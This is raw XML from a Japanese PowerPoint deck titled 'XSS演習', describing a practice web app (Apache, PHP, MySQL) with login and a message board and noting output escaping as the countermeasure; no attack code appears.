            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>サーバ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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>で構築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php</a:t>
            </a:r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・アカウントの登録機能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・ログイン機能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>ログインに使用されたメールアドレスを暗号化してセッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>に格納</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r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・フォームの機能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>送信されたメッセージをデータベースに保存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>保存されたメッセージを表示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DB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>サーバ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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1"/>
              <a:t>mysql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・アカウント情報の保持とフォームのメッセージの保存</a:t>
            </a:r>
            <a:endParaRPr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F30944-339E-40B9-A27D-159C895432E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="856363" y="431699"/>
            <a:ext cx="3616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サーバ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="ウェブサイトのイラスト">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18AECC64-11B0-4D1A-89D0-DF30657C5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464" y="1016474"/>
            <a:ext cx="2521969" cy="25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D1DCE9-27D8-4A51-B30D-74B082B70F3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5561134" y="558872"/>
            <a:ext cx="431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ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="ja-JP" dirty="0"/>
              <a:t>・</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>PASS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="ja-JP" dirty="0"/>
              <a:t>のログイン機能を実装する</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164019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s">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89E0DD9B-717B-44DC-9DC4-31E20A9FAC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3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51F35A0-6BC6-40DF-B109-BC29ACDC9E1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1748088" y="1550965"/>
            <a:ext cx="3616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対策方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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C39375-7BA7-4675-A752-93307E0A823F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3459892" y="2885302"/>
            <a:ext cx="4580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メッセージを表示させるときにエスケープ処理をする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383953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478</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>ワイド画面</PresentationFormat>
  <Paragraphs>71</Paragraphs>
  <Slides>7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XSS演習</dc:title>
  <dc:creator>cre</dc:creator>
  <cp:lastModifiedBy>cre</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-25T00:19:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-25T05:20:46Z</dcterms:modified>
</cp:coreProperties>
</file>